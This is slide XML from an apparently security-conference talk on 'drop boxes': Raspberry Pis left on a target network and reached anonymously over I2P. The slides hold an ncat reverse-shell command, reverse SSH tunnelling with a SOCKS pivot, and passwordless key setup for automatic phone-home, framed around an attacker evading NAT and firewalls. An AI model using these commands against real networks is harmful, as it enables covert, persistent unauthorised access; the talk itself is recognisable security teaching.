    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1963991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Darknet: Server side</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1600200"/>
            <a:ext cx="3429000" cy="4708525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="136525" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the server’s install of I2P (the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Raspberry Pi) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>go into the console and make a Standard server tunnel and point it to port 22 on 127.0.0.1. Also make sure you enable “Auto Start”, no other settings should need to be changed. After you start the server tunnel for the first time make note of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>“Local destination” address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="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990600"/>
            <a:ext cx="6103116" cy="6180946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="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796904"/>
            <a:ext cx="6320202" cy="6400800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="s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852" y="685800"/>
            <a:ext cx="5945148" cy="6020963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="s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0126" y="1081569"/>
            <a:ext cx="5562600" cy="5831469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26116248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Darknet: Client side</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1600200"/>
            <a:ext cx="3429000" cy="4708525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="136525" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the client’s install of I2p make a client tunnel with a port of your choosing (I used port 22 for consistency), reachable by 127.0.0.1, and insert the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>“Local destination” address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>you found above into the “Tunnel Destination(T):” field.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="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295400"/>
            <a:ext cx="5480629" cy="4962366"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="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400" y="1524000"/>
            <a:ext cx="5616600" cy="5029200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="c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300" y="1524000"/>
            <a:ext cx="5701700" cy="5105400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="c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760962"/>
            <a:ext cx="5853454" cy="3629845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2661723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SSH Phone Home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19895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2514600"/>
            <a:ext cx="5257800" cy="36576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Using the Raspberry Pi as a proxy/pivot </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reverse Shell (AKA: Shovel a shell, and get past NAT and firewalls with weak egress filtering):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1027" name="Picture 3" descr="C:\Users\adrian\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ASTO0BMV\MCj03985310000[1].wmf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="3429000"/>
            <a:ext cx="1822399" cy="1127455"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="68580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400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker’s Home PC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1029" name="computr1"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="2667000"/>
            <a:ext cx="1809750" cy="180975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tx1">
              <a:lumMod val="85000"/>
            </a:schemeClr>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a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Box on </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>target network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="4648200"/>
            <a:ext cx="1828800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NAT Box or Firewall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Elbow Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1752600" y="4191000"/>
            <a:ext cx="1600200" cy="1230868"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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29" idx="13"/>
            <a:endCxn id="1027" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2038350" y="3992728"/>
            <a:ext cx="1238250" cy="223787"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 32889"/>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5029200" y="3733800"/>
            <a:ext cx="20574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3400" y="4724400"/>
            <a:ext cx="1177925" cy="1295400"/>
            <a:chOff x="4419600" y="3581400"/>
            <a:chExt cx="1025525" cy="1295400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 13" descr="475px-Raspberry_Pi_Logo.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581400"/>
              <a:ext cx="1025525" cy="1295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114800"/>
              <a:ext cx="583461" cy="583461"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4116013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talk about?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Update of a talk I did awhile ago, now with cooler hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Little boxes you can leave behind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Internal hosts can reach the soft chewy center of a network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Svartkast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BlackThrow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> =Kamikaze Box = Drop Box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BlackThrow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>add anonymity and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cipherspace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even harder to tie to the user </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cool Raspberry Pi stuff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2836125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Proxy/Pivot The NCAT Way</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On  PC:   </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -l 74</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On Raspberry Pi: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ncat 192.168.1.137 74 -e /bin/sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2364216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Proxy/Pivot  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenSSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> way</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Raspberry Pi : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh -R 1974:localhost:22 root@some-pc-client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On  PC (must have SSH server on box):   </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1080 -p 1974 pi@localhost </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The above command also opens up a SOCKS port.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See Brandon Hutchinson’s script for automating this every 5 min </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.brandonhutchinson.com/Passwordless_ssh_logins.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.brandonhutchinson.com/ssh_tunnelling.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The following slides are based on Brandon’s notes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27666931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SSH Keys Setup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="650875" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make the keys, and transfer the public key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="136525" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh-keygen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rsa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Use a blank passphrase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>This next line is to copy of the key to the PC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/id_rsa.pub | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@home.irongeek.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"cat - &gt;&gt; ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1066800"/>
            <a:ext cx="8305800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do the following on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Raspberry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pi, but replace “root” with the username on your Linux PC (I use home.irongeek.com in these examples)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="521030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Reverse SSH Automatic Script</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2. Make a script called “</a:t>
            </a:r>
            <a:r>
